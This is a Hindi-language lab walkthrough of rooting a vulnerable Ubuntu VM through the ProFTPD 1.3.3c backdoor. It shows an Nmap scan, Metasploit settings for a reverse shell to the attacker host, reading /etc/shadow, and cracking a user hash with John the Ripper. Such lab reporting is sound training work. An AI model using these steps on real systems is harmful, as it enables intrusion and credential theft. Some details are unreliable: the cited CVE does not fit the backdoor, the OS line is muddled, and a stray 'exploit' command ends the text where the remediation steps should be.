
एक असुरक्षित Ubuntu VM पर पेनेट्रेशन परीक्षण वॉकथ्रू। ProFTPD 1.3.3c बैकडोर (CVE-2010-4221) का शोषण करके रूट एक्सेस प्राप्त किया और फ्लैग पर कब्जा किया। इसमें Nmap एन्यूमरेशन, Metasploit पेलोड सेटअप, और उपयोगकर्ता हैश क्रैकिंग (John the Ripper) शामिल है।
Offensive security Lab : ProFTPD 1.3.3c बैकडोर एक्सप्लॉइट (रूट फ्लैग)
यह रिपोर्ट एक कमजोर Linux वर्चुअल मशीन (VM) पर किए गए पैनेट्रेशन परीक्षण का विवरण देती है, जिसमें एक उच्च-जोखिम वाली सेवा भेद्यता की पहचान करने पर ध्यान केंद्रित किया गया है जिसने तत्काल रूट एक्सेस की अनुमति दी।
| विवरण | मान |
|---|---|
| लक्ष्य IP पता | [ 192.168.222.130] |
| हमलावर IP पता (LHOST) | [ 192.168.222.128] |
| लक्ष्य OS | Ubuntu 4ubuntu2.2 (Linux Kernel 3.x) |
| उद्देश्य | रूट-स्तर शेल प्राप्त करें और फ्लैग फ़ाइल पुनर्प्राप्त करें। |
प्रारंभिक टोही में खुले पोर्ट और सेवा संस्करणों की पहचान करने के लिए Nmap का उपयोग करके सेवा स्कैन शामिल था।
कमांड:
sudo nmap -sS -sV 192.168.222.130
मुख्य निष्कर्ष: | पोर्ट | सेवा | संस्करण | जोखिम | | :--- | :--- | :--- | :--- | 21/tcp | ftp | ProFTPD 1.3.3c | गंभीर (शोषण योग्य बैकडोर) | | 22/tcp | ssh | OpenSSH 7.2p2 | कम (मानक सेवा) | | 80/tcp | http | Apache httpd 2.4.18 | कम (कोई स्पष्ट वेब भेद्यता नहीं मिली) |
बाद के भेद्यता स्क्रिप्ट स्कैन ने FTP सेवा के भीतर एक अत्यधिक गंभीर बैकडोर के अस्तित्व की पुष्टि की। Nmap स्क्रिप्ट आउटपुट ने स्पष्ट रूप से रूट उपयोगकर्ता के रूप में कमांड निष्पादन दिखाया:
| ftp-proftpd-backdoor: | This installation has been backdoored. | Command: id |_ Results: uid=0(root) gid=0(root) groups=0(root)...
पुष्टि किए गए ProFTPD बैकडोर का लाभ उठाने के लिए Metasploit Framework का उपयोग किया गया।
एक्सप्लॉइट चरण:
Bash
set RHOSTS 192.168.222.130 set PAYLOAD cmd/unix/reverse set LHOST 192.168.222.128
परिणाम: एक कमांड शेल सत्र सफलतापूर्वक स्थापित किया गया, जिससे तुरंत रूट विशेषाधिकार (uid=0) प्राप्त हुए।
क्रेडेंशियल हार्वेस्टिंग
सिस्टम के उपयोगकर्ता हैश को पोस्ट-एक्सप्लॉइटेशन विश्लेषण के लिए /etc/shadow से निकाला गया। उपयोगकर्ता marlinspike के हैश को John the Ripper का उपयोग करके सफलतापूर्वक क्रैक किया गया।
प्रयुक्त कमांड (हमलावर मशीन पर):
Bash
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
क्रैक किया गया क्रेडेंशियल:
उपयोगकर्ता: marlinspike
पासवर्ड: marlinspike
समझौता की गई FTP सेवा के कारण सिस्टम की सुरक्षा स्थिति अत्यंत कमजोर है। सिस्टम को सुरक्षित करने के लिए तत्काल कदम उठाए जाने चाहिए:
निष्पादित करें: exploit